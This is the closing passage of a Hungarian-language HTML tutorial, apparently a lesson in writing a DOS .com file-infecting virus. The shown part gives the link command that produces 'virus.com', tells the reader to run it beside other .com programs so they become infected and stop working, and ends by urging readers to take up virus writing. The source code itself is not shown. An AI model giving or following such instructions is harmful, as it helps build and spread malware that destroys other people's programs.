jelenjen egy virus.obj nev&ucirc; f&aacute;jl, amit a tasm csin&aacute;lt.<br>
tlink /t virus.obj<br>
Ezut&aacute;n ha minden rendbe ment, kell hogy egy virus.com f&aacute;jlt tal&aacute;lj 
ebben a k&ouml;nyvt&aacute;rban. Ez m&aacute;r maga a v&iacute;rus. Bem&aacute;solod 
egy k&ouml;nyvt&aacute;rba, mell&eacute; m&eacute;g egy p&aacute;r com-ot, elind&iacute;tod, 
majd megpr&oacute;b&aacute;lhatod elind&iacute;tani a t&ouml;bbi com-ot is, 
de azok nem csin&aacute;lnak semmit, mert mind a virus tartalmazza. Nem kell 
megijedni, a v&iacute;rus csak a saj&aacute;t k&ouml;nyvt&aacute;r&aacute;ban 
k&eacute;pes fert&otilde;zni.</font></p>
<p><font face="Comic Sans MS">Rem&eacute;lem tetszet ez a lecke &eacute;s meghozta 
a kedveteket a v&iacute;rus&iacute;r&aacute;shoz. Tudom ez el&eacute;g &nbsp;primcsi 
v&iacute;ruska volt, de mindent az alapokt&oacute;l kell kezdeni, vagy nem? 
V&aacute;rom k&eacute;rd&eacute;seidet, siker&eacute;lm&eacute;nyeidet, probl&eacute;m&aacute;dat 
a </font><a href="mailto:Formater@ThePentagon.Com"><font face="Comic Sans MS">Formater@ThePentagon.com</font></a><font
 face="Comic Sans MS"> c&iacute;men...</font></p>
<p align="right"><font face="Comic Sans MS">Formater [FCF]</font></p>
<p align="center"><font face="Comic Sans MS"><img src="hr.gif" width="457" height="15"
 border="0"></font></p>
</body>

</html>